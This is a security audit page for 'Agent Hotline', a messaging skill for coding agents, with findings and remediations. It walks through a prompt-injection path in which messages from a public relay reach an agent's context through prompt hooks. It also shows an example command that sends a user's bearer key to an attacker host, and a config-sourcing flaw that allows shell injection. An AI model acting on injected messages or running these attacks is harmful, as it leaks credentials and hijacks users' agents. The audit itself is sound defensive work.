Back to skill

Security audit

Agent Hotline

Security checks for vulnerabilities and agentic risk

Overview

The skill is for agent-to-agent messaging, but it under-discloses risky network, credential, and prompt-hook behaviors that can affect coding-agent context and local auth keys.

Review before installing. Use a private relay or trusted peers, avoid the public shared cluster key for sensitive work, do not put secrets or proprietary code in messages, do not auto-inject remote messages into agent prompts without human review, and avoid sourcing ~/.agent-hotline/config as shell code. Treat the auth key as a secret and do not run helper scripts against untrusted server URLs.

Vulnerability Patterns
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Insecure DependenciesIntroduces malicious components through unsafe dependency sources
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
Findings (4)

T01 · Skill Instruction Hijacking

Error
Location
SKILL.md:39
Finding

Untrusted public-hub messages can be injected into the agent context

Content
View full analysis

Vulnerability Details

File Location: SKILL.md:39-50, 214-220
Vulnerability Type: Remote prompt injection through automatic context integration
Risk Level: Critical

Vulnerable code:

bash
agent-hotline serve \
  --bootstrap https://hotline.clawfight.live \
  --cluster-key c800f4e7e5a0cb6c1af5a36b8b737bfb
bash
# 3. Wire into your coding tool (adds MCP server + prompt hook)
agent-hotline setup claude-code   # Claude Code
agent-hotline setup opencode      # OpenCode
agent-hotline setup codex         # Codex
text
- Combine with hooks: Use `agent-hotline check --agent NAME --format inline --quiet` in pre-prompt hooks to auto-surface messages.

Technical Analysis

The instructions connect the local service to a third-party public relay using a cluster key published directly in the Skill documentation. Because anyone with access to this documentation can obtain that shared key, it does not establish trustworthy or individual membership.

The Skill then instructs users to install an MCP integration and prompt hook and explicitly recommends automatically surfacing received messages in pre-prompt hooks. Messages originating from remote participants are therefore introduced into an agent's context without a documented trust boundary, sender authorization policy, instruction filtering, or explicit user approval.

This creates a prompt-injection channel. An attacker can format a Hotline message as instructions to ignore the user's task, disclose data, edit files, invoke tools, or run commands. Whether a particular injected instruction succeeds depends on the receiving agent's tool permissions and its handling of untrusted context.

Attack Path

  1. The victim starts Agent Hotline with the documented public bootstrap URL and published cluster key.
  2. The victim runs one of the documented setup commands, installing the MCP integration and prompt hook.
  3. An attacker connects ...[truncated 1006 chars]
Remediation
View remediation

Remediation Suggestions

  • Remove automatic insertion of Hotline messages into pre-prompt context.
  • Present received messages as explicitly labeled, untrusted data in a separate user interface.
  • Require explicit user review and approval before using message content to influence a task or invoke a tool.
  • Apply a strict policy that remote messages cannot override system instructions, user goals, security restrictions, or tool-approval requirements.
  • Replace the published shared cluster key with unique, private, per-deployment credentials.
  • Authenticate individual senders and enforce allowlists for agents permitted to send messages.
  • Add integrity-protected sender identities, authorization checks, message provenance, and audit logs.
  • If messages must be provided to a model, place them inside a strongly delimited data structure and instruct the model to treat them only as quoted communications, never as executable instructions.
  • Require separate confirmation for sensitive operations such as shell execution, credential access, network transmission, and writes outside the project.

T09 · Insecure Skill Coding Practices

Error
Location
scripts/hotline-check.sh:9
Finding

Local bearer credential is forwarded to an arbitrary caller-supplied server

Content
View full analysis

Vulnerability Details

File Location: scripts/hotline-check.sh:9-24
Vulnerability Type: Credential exfiltration through unrestricted destination selection
Risk Level: High

Vulnerable code:

bash
AGENT="${1:-my-agent}"
SERVER="${2:-http://localhost:3456}"

# Read auth key from config if available
CONFIG="$HOME/.agent-hotline/config"
AUTH_KEY=""
if [[ -f "$CONFIG" ]]; then
  AUTH_KEY=$(grep '^HOTLINE_AUTH_KEY=' "$CONFIG" 2>/dev/null | cut -d= -f2 || true)
fi

# Build curl args
CURL_ARGS=(-sf)
if [[ -n "$AUTH_KEY" ]]; then
  CURL_ARGS+=(-H "Authorization: Bearer $AUTH_KEY")
fi

# Fetch and format inbox
RESPONSE=$(curl "${CURL_ARGS[@]}" "$SERVER/api/inbox/$AGENT" 2>/dev/null) || {

Technical Analysis

The second positional argument controls SERVER without any scheme, hostname, port, or origin validation. Independently, the script reads HOTLINE_AUTH_KEY from the user's local configuration and adds it as a bearer token to every request whenever it is present.

Consequently, supplying an attacker-controlled URL causes the local credential to be transmitted in the Authorization header to that destination. The default URL also uses plaintext HTTP. While loopback HTTP may be acceptable in a narrowly constrained local deployment, the unrestricted override permits remote plaintext destinations and does not bind the credential to the origin for which it was issued.

Shell quoting prevents direct command injection through SERVER, but it does not prevent credential disclosure because curl intentionally sends the header to the selected URL.

Attack Path

  1. The victim has a valid HOTLINE_AUTH_KEY in ~/.agent-hotline/config.
  2. An attacker persuades the victim or an agent with shell access to run:
    bash
    ./scripts/hotline-check.sh victim-agent https://attacker.example
    
  3. The script reads the bearer credential from the local configuration.
  4. It ...[truncated 833 chars]
Remediation
View remediation

Remediation Suggestions

  • Read the server URL and credential together from trusted configuration and bind the credential to that exact origin.
  • Reject a command-line server override when authentication is enabled, or require explicit confirmation before sending credentials to a different origin.
  • Parse and validate URLs, permitting HTTPS destinations and explicitly approved loopback HTTP endpoints only.
  • Maintain a hostname or origin allowlist rather than accepting arbitrary destinations.
  • Configure curl to reject insecure TLS and carefully control redirects; do not forward authorization headers across origins.
  • Consider accepting the key through a protected credential provider rather than automatically reading and transmitting it.
  • Store the configuration with restrictive permissions and document key rotation.
  • Rotate any credential that may already have been sent to an untrusted destination.

T09 · Insecure Skill Coding Practices

Error
Location
SKILL.md:23
Finding

Configuration values are evaluated as shell code

Content
View full analysis

Vulnerability Details

File Location: SKILL.md:23-28, 56-58, 138-140
Vulnerability Type: Shell command execution through unsafe configuration sourcing
Risk Level: High

Vulnerable code:

bash
source <(grep -E '^HOTLINE_(SERVER|AUTH_KEY)=' ~/.agent-hotline/config | sed 's/^/export /')
# Now $HOTLINE_SERVER and $HOTLINE_AUTH_KEY are set

The same command is recommended multiple times in the Skill documentation.

Technical Analysis

The command filters lines by variable name, prepends export, and evaluates the resulting text with Bash source. The filter validates only the beginning of each line; it does not quote or validate the value.

Because the result is interpreted as shell syntax rather than parsed as data, a matching value can contain command substitutions, shell expansions, separators, or redirections. For example, a configuration line conceptually shaped like HOTLINE_SERVER=$(attacker-command) passes the regular expression and executes the substitution when sourced.

Exploitation requires the attacker to modify the configuration or compromise a component that writes it. The unsafe documentation converts that configuration-write capability into command execution whenever a user follows the documented initialization step.

Attack Path

  1. An attacker, compromised package, or compromised Hotline component obtains write access to ~/.agent-hotline/config.
  2. The attacker inserts a matching assignment containing shell syntax, such as a command substitution in HOTLINE_SERVER.
  3. The victim follows the documented command to load the server URL and authentication key.
  4. grep retains the malicious assignment and sed prepends export.
  5. Bash source evaluates the generated line as executable shell syntax.
  6. The embedded command runs with the privileges and environment of the victim's shell.

Impact Assessment

Successful exploitation provides arbitrary command exe ...[truncated 362 chars]

Remediation
View remediation

Remediation Suggestions

  • Never pass configuration-file contents to source, eval, or another shell interpreter.
  • Parse the two expected keys as plain data with a parser that does not evaluate expansions.
  • Validate HOTLINE_SERVER as an allowed URL and validate HOTLINE_AUTH_KEY against a narrowly defined character set and length.
  • Pass parsed values directly as quoted command arguments or assign them without shell evaluation.
  • Prefer a structured configuration format such as JSON and parse it with a trusted parser.
  • Verify that the configuration is owned by the current user, is not a symbolic link to an untrusted path, and has restrictive permissions before reading it.
  • Update every occurrence of the unsafe command in the documentation.
  • Treat an unexpectedly modified configuration as a compromise indicator and rotate the authentication key.

T08 · Insecure Dependencies

Warning
Location
SKILL.md:43
Finding

Mutable unpinned npm package is installed globally and allowed to modify agent integrations

Content
View full analysis

Vulnerability Details

File Location: SKILL.md:8, 43-50
Vulnerability Type: Unpinned third-party dependency and unsafe global installation
Risk Level: Medium

Vulnerable code:

yaml
metadata: {"clawdbot":{"emoji":"📞","requires":{"bins":["agent-hotline"]},"install":[{"id":"npm","kind":"node","package":"agent-hotline","bins":["agent-hotline"],"label":"Install agent-hotline (npm)"}]}}
bash
# 1. Install
npm install -g agent-hotline

# 2. Start the server (connected to public hub)
agent-hotline serve \
  --bootstrap https://hotline.clawfight.live \
  --cluster-key c800f4e7e5a0cb6c1af5a36b8b737bfb

# 3. Wire into your coding tool (adds MCP server + prompt hook)
agent-hotline setup claude-code   # Claude Code
agent-hotline setup opencode      # OpenCode
agent-hotline setup codex         # Codex

Technical Analysis

The package reference and installation command omit a version and integrity constraint. As a result, installation resolves to whichever release the npm registry currently identifies as the latest compatible package rather than the version reviewed with this Skill.

The package is installed globally and subsequently instructed to modify coding-tool integrations by adding an MCP server and prompt hook. A compromised maintainer account, registry incident, or malicious future release could therefore execute installation or runtime code and alter security-sensitive agent configuration. No evidence in the audited files establishes that the current package is malicious; this finding concerns the unsafe dependency acquisition and trust model.

Attack Path

  1. An attacker compromises the upstream package, its maintainer account, or the package publication process.
  2. The attacker publishes a malicious release under the legitimate agent-hotline package name.
  3. A user follows the Skill and runs npm install -g agent-hotline without a version pin.
  4. npm resolves and in ...[truncated 646 chars]
Remediation
View remediation

Remediation Suggestions

  • Pin the dependency to an explicitly reviewed version instead of installing the mutable latest release.
  • Verify the package with an integrity hash or trusted signed artifact.
  • Record dependencies in a lockfile and review transitive dependencies and lifecycle scripts.
  • Prefer a project-local, least-privilege installation over a global package installation.
  • Disable npm lifecycle scripts during acquisition when feasible, then explicitly enable only reviewed setup operations.
  • Review and display all MCP and prompt-hook configuration changes before applying them.
  • Provide a verified uninstall and rollback procedure for integration modifications.
  • Monitor upstream releases and repeat the security review before changing the pinned version.
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
Findings (6)

Undeclared Tool Scope

Medium
Category
MCP Least Privilege
Confidence
91% confidence
Finding

The skill clearly instructs use of shell commands (cat, source, curl, npm install) yet declares no tool scope or permissions boundary. In an agent environment, missing scope metadata increases the chance that a caller invokes network-capable shell actions without explicit review, which weakens least-privilege controls for a skill that reads local config and transmits data externally.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
95% confidence
Finding

The documentation tells the user to read and export an auth key from ~/.agent-hotline/config and then use it in shell and HTTP requests, but provides no warning that this file contains sensitive credentials. In agent workflows, normalizing direct credential extraction can lead to accidental disclosure in logs, shell history, screenshots, subprocess environments, or downstream prompts.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
97% confidence
Finding

The skill promotes connecting to a public relay and cross-machine mesh without warning that presence and message content are sent over a network to other machines and potentially untrusted participants. In this context, the feature directly enables external data sharing, making omission of privacy/trust warnings materially dangerous because agents may forward sensitive workspace content or metadata off-host.

Content

No source excerpt is available for this finding.

External Transmission

Medium
Category
Data Exfiltration
Confidence
90% confidence
Finding

This is a true external-transmission behavior: the skill provides a curl example that sends message content to a server endpoint. The transmission is core functionality rather than obviously malicious, but it is still security-relevant because agents may send sensitive data externally, especially after sourcing local server/auth configuration.

Content

Scanner excerpt · SKILL.md (reported line 71)May include surrounding context.

curl "$HOTLINE_SERVER/api/agents" | jq

Send a message

curl -X POST "$HOTLINE_SERVER/api/message"
-H "Content-Type: application/json"
-d '{"from": "my-agent", "to": "their-agent", "content": "Hello!"}'

text

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
96% confidence
Finding

The direct-message and broadcast examples encourage sending arbitrary content, including to *, without warning that this can disclose sensitive information to other agents or all connected participants. Because this skill's purpose is inter-agent communication, omission of disclosure guidance is especially risky: users may treat it like a trusted local coordination channel when it is actually a network dissemination mechanism.

Content

No source excerpt is available for this finding.

External Transmission

Medium
Category
Data Exfiltration
Confidence
94% confidence
Finding

This example explicitly documents direct and broadcast network transmission of message content, including a broadcast-to-all pattern, which can amplify accidental data exposure. While the intent is functional documentation, in an agent skill context this is dangerous because it makes mass external dissemination easy without adjacent cautionary language or consent checks.

Content

Scanner excerpt · SKILL.md (reported line 186)May include surrounding context.

bash
# Direct message
curl -X POST "$HOTLINE_SERVER/api/message" \
  -H "Content-Type: application/json" \
  -d '{"from": "my-agent", "to": "their-agent", "content": "Hello!"}'

Static analysis

No suspicious patterns detected.